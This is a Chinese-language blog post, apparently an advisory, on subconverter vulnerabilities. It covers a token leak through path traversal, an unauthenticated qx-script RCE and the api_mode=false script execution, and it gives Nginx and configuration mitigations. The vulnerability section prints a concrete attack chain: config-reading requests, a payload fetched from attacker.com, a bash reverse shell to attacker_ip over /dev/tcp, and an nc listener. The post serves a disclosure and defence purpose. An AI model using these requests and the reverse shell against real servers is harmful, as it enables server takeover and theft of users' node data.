Subconverter 高危漏洞:你的订阅转换服务器可能已被入侵
Subconverter 高危漏洞:你的订阅转换服务器可能已被入侵
大部分公共订阅转换服务存在 RCE 漏洞——攻击者可以获取服务器控制权,盗走所有用户的节点信息。这不是理论风险,而是正在发生的事实。
漏洞概况
subconverter 是目前最流行的订阅转换后端项目,绝大多数在线转换服务都基于它搭建。它存在以下高危漏洞:
| 漏洞类型 | 影响版本 | 严重程度 | 状态 |
|---|---|---|---|
| 路径穿越泄漏 token | 所有版本 | 🔴 高危 | 未修复 |
| qx-script 未授权 RCE | ≤ 0.7.1 | 🔴 紧急 | 0.7.2 已移除该接口 |
| api_mode=false 无鉴权 RCE | 所有版本 | 🔴 高危 | 官方认定为"特性" |
漏洞详解
1. token 泄漏(所有版本)
通过 /convert 接口的路径穿越漏洞,可以直接读取 subconverter 的配置文件:
GET /convert?url=pref.toml
GET /convert?url=pref.ini
GET /convert?url=pref.yml
配置文件中包含了 token 值和 api_mode、enable_cache 等关键设置。有了 token,后续的 RCE 攻击就畅通无阻。
这个接口目前没有修复方案,只能通过 Nginx 反代来隐藏。
2. qx-script 未授权 RCE(≤ 0.7.1)
通过以下接口可以直接读取配置:
GET /qx-script?url=cHJlZi50b21s (pref.toml 的 base64)
GET /qx-script?url=cHJlZi55bWw (pref.yml 的 base64)
读取到 token 和配置后,攻击者可以:
- 构造恶意 payload,写入缓存目录
- 通过
script:cache/协议触发执行 - 获得服务器的 Shell 权限
实际攻击流程(已验证):
# 写入恶意指令到缓存
/sub?target=clash&url=http://attacker.com/payload
# payload 内容(反弹 Shell)
function parse(x){
os.exec(["sh","-c","bash -i >& /dev/tcp/attacker_ip/1880 0>&1"])
}
# 触发执行
/sub?target=clash&url=script:cache/md5,1&token=password
攻击者只需执行 nc -lvp 1880 监听,被攻击服务器就会主动连接,交出 Shell 控制权。
3. api_mode=false 的"特性"
即使升级到最新代码,如果 api_mode 设为 false(默认值),执行恶意脚本仍然不需要 token。官方对此的回应是:这不是漏洞,是特性。
也就是说,对外提供服务的订阅转换必须:
- 设置
api_mode=true - 使用强 token(不要用
password) - 但即使这样,token 仍然会通过 convert 接口泄漏
真实案例
不良林的实战演示中:
- 对某一线机场的订阅转换服务器进行测试
- 通过
/convert?url=pref.toml获取到配置中的 token - 发现 token 是弱口令
password - 成功获取服务器 Shell 权限
- 可查看所有用户的转换日志,提取节点信息
这意味着:即使你信任机场官方,攻击者也可能通过订阅转换服务器的漏洞获取你的节点。
修复方案
如果你是服务提供者
# 在 Nginx 反代中屏蔽高危接口
location /convert {
deny all;
}
location /qx-script {
deny all;
}
同时确保:
api_mode=truetoken使用强随机字符串(openssl rand -hex 32)enable_cache=false(关闭缓存可以彻底杜绝 RCE)- 使用 Docker 或最新源码编译版
注意: 即使隐藏了接口也要开启 api_mode 和强 token,防止盲打。
如果你是用户
最安全的方案是本地订阅转换(下篇文章详细介绍),或者使用 CF Worker 反代方案(前文已介绍)。简单说:
- 不要长期依赖任何公共在线订阅转换服务
- 不要认为"机场官方提供的就安全"
- 建议花 5 分钟搭建自己的 CF Worker 代理
总结
subconverter 的漏洞不是理论模型,而是真实世界中可以被复现的攻击路径。如果你在使用任何在线订阅转换服务,你的节点信息可能已经暴露。这不是危言耸听——公共转换服务"一大半存在这种情况,或许早就被利用了"。
信任不能替代可验证的安全。 花几分钟搭建自己的转换通道,是对自己隐私最基本的尊重。
参考来源:不良林《【高危漏洞】小心你的节点被盗!》视频及文章
暂无评论
评论已关闭
此文章的评论功能已关闭。